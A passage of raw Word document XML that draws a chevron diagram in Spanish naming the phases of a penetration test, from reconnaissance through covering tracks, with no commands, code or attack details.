                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080259" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664207" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="889ED1"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="385" name="Graphic 385"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8023859" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1664207" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080259" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664207" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416051" y="416051"/>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386" name="Graphic 386"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="9895331" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416052" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080260" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="9EACD7"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="387" name="Graphic 387"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="9895331" y="6350"/>
                            <a:ext cx="2080260" cy="832485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2080260" h="832485">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2080260" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664208" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="832103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="416052" y="416051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12699">
                            <a:solidFill>
                              <a:srgbClr val="FFFFFF"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="388" name="Textbox 388"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="663244" y="328549"/>
                            <a:ext cx="1343660" cy="203200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="452F5155" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="319" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Reconocimiento</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="389" name="Textbox 389"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2910839" y="217043"/>
                            <a:ext cx="1130300" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7018B699" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="305" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Escaneo y</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="7F22082F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="364" w:lineRule="exact"/>
                                <w:ind w:left="23"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Enumeración</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="390" name="Textbox 390"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5019421" y="217043"/>
                            <a:ext cx="655955" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="550937E2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="305" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Ganando</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="5DB1BE8E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="364" w:lineRule="exact"/>
                                <w:ind w:left="67"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Acceso</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="391" name="Textbox 391"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6705600" y="217043"/>
                            <a:ext cx="1029969" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="12E71627" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="305" w:lineRule="exact"/>
                                <w:ind w:right="18"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-4"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Exponer</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="464991BC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="364" w:lineRule="exact"/>
                                <w:ind w:right="18"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Explotación</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="392" name="Textbox 392"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8577706" y="217043"/>
                            <a:ext cx="1029335" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="41001C9E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="305" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Mantener</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="3C56A9B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="364" w:lineRule="exact"/>
                                <w:ind w:left="50"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Persistencia</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="393" name="Textbox 393"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="10524743" y="217043"/>
                            <a:ext cx="880110" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6ECFC8A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="305" w:lineRule="exact"/>
                                <w:ind w:left="21"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Quitar</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="34519A0B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:line="364" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Huellas</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="5FE82CB8" id="Group 376" o:spid="_x0000_s1182" style="position:absolute;margin-left:8.5pt;margin-top:20.15pt;width:943.5pt;height:66.55pt;z-index:-15653376;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordsize="119824,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">
                <v:shape id="Graphic 377" o:spid="_x0000_s1183" style="position:absolute;top:63;width:26155;height:8325;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="261556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" path="m2199132,l,,416052,416051,,832103r2199132,l2615184,416051,2199132,xe" fillcolor="#3c67b0" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 378" o:spid="_x0000_s1184" style="position:absolute;left:24079;top:63;width:20802;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" path="m1664208,l,,416051,416051,,832103r1664208,l2080260,416051,1664208,xe" fillcolor="#4971be" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 379" o:spid="_x0000_s1185" style="position:absolute;left:24079;top:63;width:20802;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" path="m,l1664208,r416052,416051l1664208,832103,,832103,416051,416051,,xe" filled="f" strokecolor="white" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 380" o:spid="_x0000_s1186" style="position:absolute;left:42793;top:63;width:20803;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" path="m1664207,l,,416051,416051,,832103r1664207,l2080259,416051,1664207,xe" fillcolor="#5f80c5" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 381" o:spid="_x0000_s1187" style="position:absolute;left:42793;top:63;width:20803;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" path="m,l1664207,r416052,416051l1664207,832103,,832103,416051,416051,,xe" filled="f" strokecolor="white" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 382" o:spid="_x0000_s1188" style="position:absolute;left:61508;top:63;width:20803;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" path="m1664208,l,,416052,416051,,832103r1664208,l2080260,416051,1664208,xe" fillcolor="#758fca" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 383" o:spid="_x0000_s1189" style="position:absolute;left:61508;top:63;width:20803;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" path="m,l1664208,r416052,416051l1664208,832103,,832103,416052,416051,,xe" filled="f" strokecolor="white" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 384" o:spid="_x0000_s1190" style="position:absolute;left:80238;top:63;width:20803;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" path="m1664207,l,,416051,416051,,832103r1664207,l2080259,416051,1664207,xe" fillcolor="#889ed1" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 385" o:spid="_x0000_s1191" style="position:absolute;left:80238;top:63;width:20803;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" path="m,l1664207,r416052,416051l1664207,832103,,832103,416051,416051,,xe" filled="f" strokecolor="white" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 386" o:spid="_x0000_s1192" style="position:absolute;left:98953;top:63;width:20802;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" path="m1664208,l,,416052,416051,,832103r1664208,l2080260,416051,1664208,xe" fillcolor="#9eacd7" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 387" o:spid="_x0000_s1193" style="position:absolute;left:98953;top:63;width:20802;height:8325;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="208026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" path="m,l1664208,r416052,416051l1664208,832103,,832103,416052,416051,,xe" filled="f" strokecolor="white" strokeweight=".35275mm">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 388" o:spid="_x0000_s1194" type="#_x0000_t202" style="position:absolute;left:6632;top:3285;width:1343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452F5155" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="319" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Reconocimiento</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Textbox 389" o:spid="_x0000_s1195" type="#_x0000_t202" style="position:absolute;left:29108;top:2170;width:113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7018B699" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="305" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Escaneo y</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7F22082F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="364" w:lineRule="exact"/>
                          <w:ind w:left="23"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Enumeración</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Textbox 390" o:spid="_x0000_s1196" type="#_x0000_t202" style="position:absolute;left:50194;top:2170;width:6559;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550937E2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="305" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Ganando</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5DB1BE8E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="364" w:lineRule="exact"/>
                          <w:ind w:left="67"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Acceso</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Textbox 391" o:spid="_x0000_s1197" type="#_x0000_t202" style="position:absolute;left:67056;top:2170;width:10299;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12E71627" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="305" w:lineRule="exact"/>
                          <w:ind w:right="18"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-4"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Exponer</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="464991BC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="364" w:lineRule="exact"/>
                          <w:ind w:right="18"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Explotación</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Textbox 392" o:spid="_x0000_s1198" type="#_x0000_t202" style="position:absolute;left:85777;top:2170;width:1029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41001C9E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="305" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Mantener</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3C56A9B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="364" w:lineRule="exact"/>
                          <w:ind w:left="50"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Persistencia</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Textbox 393" o:spid="_x0000_s1199" type="#_x0000_t202" style="position:absolute;left:105247;top:2170;width:880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6ECFC8A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="305" w:lineRule="exact"/>
                          <w:ind w:left="21"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Quitar</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="34519A0B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:line="364" w:lineRule="exact"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Huellas</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="11413D18" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId183"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1080" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED169BC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15804928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07509D73" wp14:editId="3AB503CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="132588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25880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1325880"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="395" name="Graphic 395"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="396" name="Textbox 396"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
